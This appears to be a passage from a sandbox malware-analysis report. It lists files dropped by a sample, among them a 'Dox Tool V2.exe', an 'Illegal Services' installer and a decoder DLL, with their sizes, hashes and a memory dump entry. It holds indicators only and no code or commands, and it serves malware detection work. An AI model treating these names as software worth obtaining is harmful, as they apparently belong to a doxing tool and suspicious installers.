C:\Users\Admin\AppData\Local\Temp\MSI2537.tmp

Filesize
436KB

MD5
475d20c0ea477a35660e3f67ecf0a1df

SHA1
67340739f51e1134ae8f0ffc5ae9dd710e8e3a08

SHA256
426e6cf199a8268e8a7763ec3a4dd7add982b28c51d89ebea90ca792cbae14dd

SHA512
99525aaab2ab608134b5d66b5313e7fc3c2e2877395c5c171897d7a6c66efb26b606de1a4cb01118c2738ea4b6542e4eb4983e631231b3f340bf85e509a9589e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar232F.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
41b380e2654d8d8c4cad0938b1bdca26

SHA1
680ebc3de9b1ea6802b177055e8417b9c3f2780f

SHA256
d516dd7b6aec64e7eec7c86cfb8513e4caa200423522b0425019c33d603e17db

SHA512
05135c45a0a74ea0d6ff7896efd2639b5da9fa7c6a8e74d82fbde320fa6fed255c8b143199339a0e4f75e8fa092fdd1429a5115dbe97897389266302b9d9a8c9

Download Submit
\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe

Filesize
180KB

MD5
3075fc835b4f3b7b20dfee9ecc5dfaa0

SHA1
6cf171b5372ebad3adfafeeb6afa0b57b88dd9af

SHA256
81fdaf72bc2de5cdef33f74d867092172c40a5c1fe86c3313f9fcd0a0c22eac8

SHA512
41f81a88bab647ba079b5ee176213c392b172e73459396d18e249a8acd80b416d2bb8679b3a97cce9fd63ee18aadf0f9a552770f1de4685efb736114403f53e5

Download Submit
\Users\Admin\AppData\Local\Temp\IB_U_Z_Z_A_R_Dl\Illegal Services 6.1\install\decoder.dll

Filesize
205KB

MD5
912135871892d0b2685c3dc816e469a7

SHA1
193a30fb66b0d43fa3e372a503781cb9d9502c0b

SHA256
d4282c9805e7ff97a7bebcbbed608d7daa3dc4c72354690ba94b685550728549

SHA512
0b6936c036b033c3a3dc646dcb52163ceec9558ed9d679cef5e454b4e907c893c6ee2549c8e957ecd9bb70ed4b26e8f36cba69a39c0f80e197e656decf23c393

Download Submit
\Users\Admin\AppData\Local\Temp\IS.Setup.exe

Filesize
17.5MB

MD5
f48ca4a6e5457dbb41d8de929da88c7c

SHA1
2908ae49cdaa4489ed80f25b8096bd79fb77ee42

SHA256
84dab96a11da002f640ba371f218c49fc3c13d192b9ffbae63cea45bf572ef2d

SHA512
a46e8e2fa8bb5f8f1c4158546c11c4b531047706ef4eb45bb288096d02d3d6212f4d92a13fb3d6402296256947558c470433ebcc9068f0a5712f9070e39b1bdd

Download Submit
memory/2356-18-0x00000000012C0000-0x00000000012F2000-memory.dmp

Filesize
200KB

Download